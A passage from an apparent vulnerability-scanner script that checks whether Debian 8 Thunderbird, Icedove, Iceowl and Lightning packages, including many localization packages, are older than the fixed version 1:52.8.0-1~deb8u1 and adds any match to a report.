res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ja\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-kab\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ko\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-lt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nb-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-nn-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pa-in\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-pt-pt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-rm\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ro\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ru\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-si\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sq\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-sv-se\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-ta-lk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-tr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-uk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-vi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-cn\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"icedove-l10n-zh-tw\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-extension\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ast\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-be\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-bn-bd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ca\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cs\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-cy\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-da\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-de\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-dsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-el\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-en-gb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-es-es\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-et\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-eu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-fy-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ga-ie\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-gl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-he\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-hy-am\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-id\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-is\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-it\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ja\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-kab\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ko\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-lt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nb-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-nn-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pa-in\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-pt-pt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-rm\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ro\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ru\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-si\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sq\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-sv-se\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-ta-lk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-tr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-uk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-vi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-cn\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceowl-l10n-zh-tw\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ast\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-be\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-bn-bd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ca\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cs\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-cy\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-da\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-de\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-dsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-el\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-en-gb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-es-es\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-et\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-eu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-fy-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ga-ie\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-gl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-he\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hy-am\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-id\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-is\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-it\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ja\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kab\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ko\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-lt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nb-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nn-no\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pa-in\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-pt\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-rm\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ro\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ru\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-si\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sq\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sv-se\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ta-lk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-tr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-uk\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-vi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-cn\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-tw\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dbg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dev\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-all\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ast\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-be\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bg\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bn-bd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-br\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ca\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cs\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-da\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-de\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-dsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-el\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-en-gb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-ar\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-es\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-et\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-eu\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fi\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fy-nl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ga-ie\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gd\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gl\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-he\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hr\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hsb\", ver:\"1:52.8.0-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hu\", 